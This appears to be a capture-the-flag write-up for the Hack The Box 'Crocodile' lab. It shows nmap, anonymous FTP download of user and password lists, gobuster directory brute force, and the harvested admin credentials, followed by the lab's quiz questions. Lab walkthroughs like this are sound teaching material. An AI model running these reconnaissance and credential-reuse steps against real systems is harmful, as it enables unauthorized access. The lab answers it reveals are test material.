Very EasyTier 1Linux10.129.1.15

$ crocodile.pwn()

FTP anonymous login exposes two files: a userlist and password list. We use gobuster to find login.php, then use the harvested credentials to authenticate as admin via the web interface.

Techniques

Anonymous FTP LoginCredential HarvestingDirectory Brute ForcePHP Login Bypass

Open Ports

21/tcpftpvsftpd 3.0.3

80/tcphttpApache httpd 2.4.41 (Ubuntu)

Terminal Session

wazimu@htb ~ crocodile

┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ nmap -sC -sV 10.129.1.15
Nmap scan report for 10.129.1.15

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- allowed.userlist
|_-rw-r--r-- allowed.userlist.passwd
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ ftp 10.129.1.15
Name: Anonymous
230 Login successful.
ftp> get allowed.userlist
ftp> get allowed.userlist.passwd
ftp> exit

┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ cat allowed.userlist
aron
pwnmeow
egotisticalsw
admin

┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd

┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ gobuster dir -u 10.129.1.15 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html
/login.php            (Status: 200) [Size: 1577]
/dashboard            (Status: 301) [--> http://10.129.1.15/dashboard/]

# Credentials: admin / rKXM59ESxesUFHAd (last user / last password)
[✓] Flag captured after login!

Tasks (9)

What Nmap scanning switch employs the use of default scripts during a scan?

What service version is found to be running on port 21?

What FTP code is returned to us for the 'Anonymous FTP login allowed' message?

After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?

After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?

What is one of the higher-privilege sounding usernames in 'allowed.userlist' that we download from the FTP server?

What version of Apache HTTP Server is running on the target host?

What switch can we use with Gobuster to specify we are looking for specific filetypes?

Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?

Root Flag

← All Writeups Cybersecurity Quizzes →